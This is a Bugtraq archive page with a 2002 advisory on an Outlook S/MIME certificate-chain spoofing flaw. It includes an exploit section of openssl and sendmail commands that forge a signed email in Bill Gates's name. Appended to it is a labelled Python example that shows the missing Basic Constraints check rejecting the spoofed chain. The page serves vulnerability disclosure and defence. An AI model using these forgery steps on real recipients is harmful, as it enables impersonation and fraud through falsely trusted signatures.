Bugtraq mailing list archives
Outlook S/MIME Vulnerability
From: Mike Benham <moxie () thoughtcrime org>
Date: Mon, 2 Sep 2002 10:37:23 -0700 (PDT)
=======================================================================
Outlook S/MIME Vulnerability
09/02/02
Mike Benham <moxie () thoughtcrime org>
http://www.thoughtcrime.org
=======================================================================

Abstract

Outlook's S/MIME implementation is vulnerable to the certificate chain
spoofing attack, despite Microsoft's claim that IE is the only affected
application. The vulnerability allows anyone to forge the digital
signature on an email that is to be viewed with Outlook. No warnings are
given, no dialogs are shown.

=======================================================================

Description

For a complete description of the certificate chain attack, see:
http://online.securityfocus.com/archive/1/286290

As with the IE SSL vulnerability, an attacker generates a bad certificate
chain:

[Issuer:VeriSign | Subject:VeriSign]
[Issuer:VeriSign | Subject:www.thoughtcrime.org]
[Issuer:www.thoughtcrime.org | Subject:Bill Gates/billgates () microsoft com]

Outlook fails to check the Basic Constraints on the intermediate
certificate and accepts the leaf certificate as valid.

=======================================================================

Severity

As it stands, there is virtually no difference between signed and
unsigned email in Outlook. Unless carefully inspected, signed email in
Outlook is essentially meaningless. This also applies to any signed email
received over the past 5+ years.

Prudent users who must continue using Outlook for signed email should
manually inspect and verify received certificate chains.

=======================================================================

Affected Clients

Mozilla is NOT vulnerable.
Outlook Express 5 is vulnerable. (Tested on fully patched Win2k SP3 system)

=======================================================================

Exploit

1) Put a valid CA-signed certificate and private key in a file
   "middle.pem"
   (If you don't have a valid CA-signed certificate, there's one bundled
   with sslsniff: http://www.thoughtcrime.org/ie.html)

2) Generate a fake leaf certificate signing request:
   a) openssl genrsa -out key.pem 1024
   b) openssl req -new -key key.pem -out leaf.csr

3) Sign the CSR with your "intermediate" certificate:
   a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem
      -CAcreateserial -out leaf.pem

4) Sign a spoofed mail message:
   a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem
      -inkey key.pem -certfile middle.pem -from billgates () microsoft com
      -to whomever () wherever com -subject "SM Exploit"

5) Send the mail:
   a) cat mail.msg | sendmail whomever () wherever com

I encourage everyone to send Bill Gates an email from himself. =)

=======================================================================

Vendor Notification Status

Microsoft knows about this, of course, but "isn't even sure whether to
call this a 'vulnerability'." Right.

- Mike

--
http://www.thoughtcrime.org
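The missing check the advisory describes is the Basic Constraints test that every path validator is supposed to perform on each issuing certificate. The following is an added example, not code from the advisory or from any S/MIME client: it models the three-certificate chain above as plain Python records (subject, issuer, and the DER value of each certificate's BasicConstraints extension; the extension bytes are constructed values, the names are the advisory's), decodes the extension by hand, and walks the chain twice, once with name chaining only (the behaviour the advisory attributes to Outlook) and once with the CA flag and pathLenConstraint enforced. Signature verification is represented only by the issuer/subject name match so that the block runs offline with the standard library.

```python
"""Chain check that enforces X.509 Basic Constraints (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Cert:
    subject: str
    issuer: str
    basic_constraints: Optional[bytes]  # DER value of the extension, None if absent


def parse_basic_constraints(der: Optional[bytes]) -> Tuple[bool, Optional[int]]:
    """Decode BasicConstraints ::= SEQUENCE { cA BOOLEAN DEFAULT FALSE,
    pathLenConstraint INTEGER OPTIONAL } from its DER value.

    Returns (is_ca, path_len). An absent extension means "not a CA", and DER
    omits the BOOLEAN entirely when it has its default value FALSE.
    Only short-form lengths (< 128 bytes) are handled, which covers this
    extension in practice.
    """
    if der is None:
        return False, None
    if len(der) < 2 or der[0] != 0x30 or der[1] != len(der) - 2:
        raise ValueError("not a definite-length DER SEQUENCE")
    body = der[2:]
    is_ca, path_len, pos = False, None, 0
    if pos < len(body) and body[pos] == 0x01:          # BOOLEAN tag
        if body[pos + 1] != 1:
            raise ValueError("bad BOOLEAN length")
        is_ca = body[pos + 2] == 0xFF
        pos += 3
    if pos < len(body) and body[pos] == 0x02:          # INTEGER tag
        n = body[pos + 1]
        path_len = int.from_bytes(body[pos + 2:pos + 2 + n], "big")
        pos += 2 + n
    if pos != len(body):
        raise ValueError("trailing bytes in BasicConstraints")
    return is_ca, path_len


def validate_chain(chain: List[Cert], trusted_roots: List[str],
                   check_basic_constraints: bool = True) -> Tuple[bool, str]:
    """Walk a leaf-first chain up to a trusted root.

    With check_basic_constraints=False every issuer is accepted as long as
    the names chain, which is the shortcut the advisory describes. With it
    True, each issuing certificate must assert CA:TRUE and the number of
    intermediates beneath it must not exceed its pathLenConstraint.
    """
    if not chain:
        return False, "empty chain"
    for depth, cert in enumerate(chain[:-1]):
        issuer = chain[depth + 1]
        if issuer.subject != cert.issuer:
            return False, f"{cert.subject!r} was not issued by {issuer.subject!r}"
        # A real validator verifies cert's signature with issuer's key here.
        if check_basic_constraints:
            is_ca, path_len = parse_basic_constraints(issuer.basic_constraints)
            if not is_ca:
                return False, f"{issuer.subject!r} is not a CA (Basic Constraints)"
            # pathLen bounds the non-self-issued intermediates below this CA,
            # not counting the end-entity certificate; that count equals depth.
            if path_len is not None and depth > path_len:
                return False, f"{issuer.subject!r} pathLenConstraint {path_len} exceeded"
    root = chain[-1]
    if root.subject not in trusted_roots:
        return False, f"chain does not end in a trusted root ({root.subject!r})"
    return True, f"chain ends in trusted root {root.subject!r}"


# Constructed chain mirroring the advisory. The middle certificate is an
# ordinary end-entity certificate, so its BasicConstraints is an empty
# SEQUENCE (cA defaults to FALSE); the root is a CA with no length limit.
SPOOFED_CHAIN = [
    Cert("Bill Gates/billgates@microsoft.com", "www.thoughtcrime.org", None),
    Cert("www.thoughtcrime.org", "VeriSign", bytes.fromhex("3000")),
    Cert("VeriSign", "VeriSign", bytes.fromhex("30030101ff")),
]
TRUSTED = ["VeriSign"]


def name_chaining_only() -> Tuple[bool, str]:
    """The advisory's failure mode: names chain, so the leaf is accepted."""
    return validate_chain(SPOOFED_CHAIN, TRUSTED, check_basic_constraints=False)


def with_basic_constraints() -> Tuple[bool, str]:
    """A conforming validator rejects the chain at the non-CA intermediate."""
    return validate_chain(SPOOFED_CHAIN, TRUSTED, check_basic_constraints=True)


if __name__ == "__main__":
    print("name chaining only :", name_chaining_only())
    print("basic constraints  :", with_basic_constraints())
```

The advisory's advice to inspect received chains by hand amounts to performing the second walk yourself: look at each certificate above the signer and confirm it carries a BasicConstraints extension with CA:TRUE, and that any pathLenConstraint it states is not exceeded by the intermediates beneath it.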
Current thread:
- Outlook S/MIME Vulnerability Mike Benham (Sep 02)
- Re: Outlook S/MIME Vulnerability Spyder (Sep 03)
- Re: **maillist:: Outlook S/MIME Vulnerability Thomas Seliger (Sep 03)
- Re: **maillist:: Outlook S/MIME Vulnerability Timothy J . Miller (Sep 04)
- Re: **maillist:: Outlook S/MIME Vulnerability Torbjörn Hovmark (Sep 04)